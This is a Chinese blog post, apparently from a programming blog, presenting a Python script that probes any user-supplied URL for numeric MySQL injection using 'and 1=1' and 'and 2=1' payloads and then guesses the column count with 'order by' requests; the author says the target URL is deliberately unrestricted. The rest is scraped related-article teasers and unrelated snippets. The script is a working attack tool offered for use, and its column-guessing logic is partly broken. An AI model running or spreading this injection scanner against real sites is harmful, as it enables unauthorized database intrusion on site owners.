前言:

总是想写一个sql注入脚本,但是之前的那些都不行。

这次做好了准备,然后嘿嘿嘿。

准备:

sql注入的基础知识

熟悉怎么判断

正文:

思路概念图:

这里我没有限制用户输入,不限制的话可能会 @&#@*#&@* = =

代码:

import requests

from bs4 import BeautifulSoup

import time

import re

import sys

def user():

    wailtfor=input('请输入你要进行sql注入测试的url:')

    print('------开启第一重验证------')

    url="{}".format(wailtfor)

    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}

    request=requests.get(url=url,headers=headers,timeout=6)

    if request.status_code != 200:

        print('[-]抱歉该url十分的不稳定,退出程序中......')

        time.sleep(1)

        sys.exit()

    else:

        print('[+]第一重验证已经完成,目标是稳定的')

        journal=open('journal.txt','w',encoding='utf-8')

        journal.write('{}是稳定的\n'.format(url))

        journal.write('下一步进行判断是否存在注入')

        journal.close()

    print('------开启第二重测试------')

    def ceshi():

        pay1 = '%20and%201=1'

        pay2 = '%20and%202=1'

        Testinjection1 = request.url + pay1

        Testinjection2=request.url+pay2

        print('-------尝试数字型注入------')

        print(Testinjection1)

        print(Testinjection2)

        Testg=requests.get(Testinjection1,headers=headers)

        print(Testg.headers)

        Testg2=requests.get(Testinjection2,headers=headers)

        print(Testg2.headers)

        if Testg.text != Testg2.text:

            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

            journal2 = open('journal.txt', 'a')

            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

            journal2.close()

            print('------开始猜字段数------')

        elif Testg.headers != Testg2.headers:

            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1,pay2),'可能存在注入点')

            journal2=open('journal.txt','a')

            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1,pay2))

            journal2.close()

            print('------开始猜字段数------')

        else:

            print('[-]数字型注入失败')

            print('[!]尝试字符型注入')

            sys.exit()

        a='ooo'

        for s in range(1,100):

            if a=='xxx':break

            orpay=url+'%20order%20by%20{}'.format(s)

            res=requests.get(orpay,headers=headers)

            ewe=res.content

            lk=re.finditer('mysql_fetch_array()',str(ewe))

            for p in lk:

                print(str(p))

                g='''<_sre.SRE_Match object; span=(232, 249), match='mysql_fetch_array'>'''

                if str(p) == g:

                    print('字段数payload:', res.url)

                    dw = int(res.url[-1:])-1

                    print(type(dw))

                    print('字段数长度为:', dw)

                    a='xxx'

                else:

                    print('字段数payload:',res.url)

                    dw=int(res.url[-1:])-1

                    print('字段数长度为:',dw)

                    a='xxx'

    ceshi()

user()

  测试结果如下:

代码还有很多不足,诺各位大佬有什么好的意见请多多留言。 = =

最后送上一首歌:

python打造一个Mysql数字类型注入脚本(1)的更多相关文章

  1. python打造一个分析网站SQL注入的脚本

    前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...

  2. MySQL数字类型中的三种常用种类

    数字类型 MySQL数字类型按照我的分类方法分为三类:整数类.小数类和数字类. MySQL数字类型之一我所谓的“数字类” 就是指 DECIMAL 和 NUMERIC,它们是同一种类型.它严格的说不是一 ...

  3. phantomjs + python 打造一个微信机器人

    phantomjs + python 打造一个微信机器人 1.前奏   媳妇公司不能上网,但经常需要在公众号上找一些文章做一些参考,需要的时候就把文章链接分享给我,然后我在浏览器打开网页,一点点复制过 ...

  4. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  5. 《Python核心编程》数字类型

    1.数字类型简单介绍 Python中数字类型包含:整型.长整型.布尔型.双精度浮点型.十进制浮点型.复数.这些数字类型都是不可变类型.也就是说,改变了数字的值会生成新的对象. 在Python中删除数字 ...

  6. MySQL数字类型学习笔记

    数字类型 最近在看<MySQL技术内幕:SQL编程>并做了笔记,所以本博客是一篇笔记类型博客,分享出来方便自己复习,也可以帮助他人 整型 类型 占用空间 最小值(SIGNED) 最大值(S ...

  7. MySQL数字类型int与tinyint、float与decimal如何选择

    最近在准备给开发做一个mysql数据库开发规范方面培训,一步一步来,结合在生产环境发现的数据库方面的问题,从几个常用的数据类型说起. int.tinyint与bigint 它们都是(精确)整型数据类型 ...

  8. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  9. python基本数据类型之数字类型和其相关运算

    数字(number) Python3 支持 int.float.bool.complex(复数). 在Python 3里,只有一种整数类型 int,表示为长整型,没有 python2 中的 Long. ...

随机推荐

  1. Dynamics 365 for CRM: Sitemap站点图的可视化编辑功能

    Dynamics 365 for CRM 提供了Sitemap站点图的可视化编辑功能 在之前的所有版本中,我们只能通过从系统中导出站点图的XML进行编辑后再导入(容易出错),或使用第三方的Sitema ...

  2. lua continue实现

    --第一种 , do while true do == then break end -- 这里有一大堆代码 -- -- break end end --第二种 i = ) do if () then ...

  3. RPC原理解析

    1.RPC原理解析 1.1 什么是RPC RPC(Remote Procedure Call Protocol) --远程过程调用协议,它是一种通过网络从远程计算机程序上请求服务,而不需要了解底层网络 ...

  4. Alpha第四天

    Alpha第四天 听说 031502543 周龙荣(队长) 031502615 李家鹏 031502632 伍晨薇 031502637 张柽 031502639 郑秦 1.前言 任务分配是VV.ZQ. ...

  5. 201621123040《Java程序设计》第3周学习总结

    1.本周学习总结 1.1 写出你认为本周学习中比较重要的知识点关键词,如类.对象.封装等 面向对象的思想 对象 类 1.2 用思维导图或者Onenote或其他工具将这些关键词组织起来. 掌握的还不够深 ...

  6. Android广播发送失败

    现在至今为止Android 8.0 不支持大部分广播收发 如果无法使用建议换至Android 7.0版本 且 minSdkVersion 24

  7. 06_Python的数据类型3元组,集合和字典_Python编程之路

    上一节跟大家讲了Python的列表,当然不是完整的讲完,后续我们还会提到,这一节我们还是来讲Python的数据类型 首先要讲到的就是元组 元组其实拥有列表的一些特性,可以存储不同类型的值,但在某些方面 ...

  8. JAVA_SE基础——56.包的创建

    接下来我来给大家讲下--包 , 先看一段代码 class Demo1{ public static void main(String[] args) { System.out.println(&quo ...

  9. C# 使用 GDI+ 给图片添加文字,并使文字自适应矩形区域

    需求 需求是要做一个编辑文字的页面.用户在网页端写文字,文字区域是个矩形框,用户可以通过下方的拖动条调节文字大小. 如下图: 提交数据的时候前端传文字区域的左上角和右下角定位给后台.因为前端的字体大小 ...

  10. 帧动画的创建方式 - 纯Java代码方式

    废话不多说,先看东西 帧动画的创建方式主要以下2种: * 用xml创建动画: * 纯Java代码创建动画:   本文内容主要关注 纯java代码创建帧动画 的方式: 用xml创建帧动画:http:// ...